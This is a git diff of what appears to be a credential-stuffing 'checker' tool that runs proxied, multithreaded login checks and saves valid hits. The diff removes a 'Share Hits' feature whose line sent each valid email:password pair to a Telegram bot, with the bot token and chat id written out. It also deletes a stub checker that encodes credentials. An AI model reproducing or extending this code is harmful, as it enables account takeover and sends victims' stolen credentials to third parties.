diff --git a/main.py b/main.py index 330adea..9a7b50a 100755 --- a/main.py +++ b/main.py @@ -43,7 +43,6 @@ def info(): BTC: bc1qt6gcll4hp7wwqaap7x3lwunf9srw4enuxxddzn ETH: 0xd7F5C1AB4765Be15F738367905bF4E7Ea83eC9F7 LTC: LdsjBD8ACvqUinrgbJJvCcELs2AxN5NSpc - [{cyan}>{reset}] Consider turning on hit share in the settings if u cant donate :) [{cyan}>{reset}] If you payed for this application, you were SCAMMED! @@ -119,7 +118,6 @@ def settings(): [{cyan}3{reset}] Print Mode : {"CUI" if Checker.cui else "LOG"} [{cyan}4{reset}] Retries : {Checker.retries} [{cyan}5{reset}] Threads : {Checker.threads} - [{cyan}6{reset}] Share Hits : {Checker.share} [{cyan}X{reset}] Back""") option = input(f" [{cyan}>{reset}] ").lower() @@ -128,7 +126,6 @@ def settings(): elif option == "3": change("print") elif option == "4": change("retries") elif option == "5": change("threads") - elif option == "6": change("share") elif option == "x": return def tools(): diff --git a/modules/checkers/private.py b/modules/checkers/private.py deleted file mode 100644 index 55a55a8..0000000 --- a/modules/checkers/private.py +++ /dev/null @@ -1,20 +0,0 @@ -from modules.variables import Checker -from modules.functions import bad_proxy, log,save,set_proxy -from requests import get,post -from base64 import b64encode - -def check(email:str,password:str): - retries = 0 - while retries != Checker.retries: - proxy = set_proxy() - proxy_set = set_proxy(proxy) - - auth = b64encode(f"{email}:{password}".encode()).decode() - try: - pass - except: - bad_proxy(proxy) - Checker.errors += 1 - Checker.bad += 1 - Checker.cpm += 1 - return \ No newline at end of file diff --git a/modules/config.py b/modules/config.py index 92f57f0..1dce258 100644 --- a/modules/config.py +++ b/modules/config.py @@ -4,7 +4,7 @@ from os import makedirs, listdir from json import load, dump -default = {"proxy_type":"http","proxy_timeout":5,"threads":200,"retries":1,"print_mode":"cui","share":False} +default = {"proxy_type":"http","proxy_timeout":5,"threads":200,"retries":1,"print_mode":"cui"} def load_config(): """Load the config values""" @@ -15,7 +15,6 @@ def load_config(): Checker.retries = int(data["retries"]) Checker.timeout = int(data["proxy_timeout"]) Checker.threads = int(data["threads"]) - Checker.share = bool(data['share']) cui = data["print_mode"].lower() if Checker.threads <= 0: Checker.threads = 1 if Checker.proxy_type not in ("http","socks4","socks5"): raise @@ -87,8 +86,4 @@ def change(option:str): values["threads"] = threads update_config(values) except: - pass - elif option == "share": - Checker.share = False if Checker.share else True - values["share"] = Checker.share - update_config(values) \ No newline at end of file + pass \ No newline at end of file diff --git a/modules/functions.py b/modules/functions.py index b4aa893..8c498fc 100644 --- a/modules/functions.py +++ b/modules/functions.py @@ -87,7 +87,6 @@ def save(name:str,type:str,time:str,content:str): with open(f"Results/{time}/{name}_custom.txt","a",errors="ignore") as file: file.write(content+"\n") elif type == "good": with open(f"Results/{time}/{name}_good.txt","a",errors="ignore") as file: file.write(content+"\n") - if Checker.share: get(f'https://api.telegram.org/bot5058115375:AAHar3ywXS0EU1BhVGo2XOFYXoNDG5qc8hw/SendMessage?chat_id=-1001590452857&text={name} - {content}',timeout=5) else: with open(f"Results/{time}/{name}.txt","a",errors="ignore") as file: file.write(content+"\n") diff --git a/modules/variables.py b/modules/variables.py index c1c0ac9..5bfb2ff 100644 --- a/modules/variables.py +++ b/modules/variables.py @@ -1,6 +1,6 @@ from threading import Lock lock = Lock() -version = "0.2.6" +version = "0.2.6.1" class Checker: bad = 0 good = 0 @@ -18,7 +18,6 @@ class Checker: time = "" cui = True - share = False retries = 1 timeout = 10 threads = 200 diff --git a/version b/version index a53741c..088a324 100644 --- a/version +++ b/version @@ -1 +1 @@ -0.2.6 \ No newline at end of file +0.2.6.1 \ No newline at end of file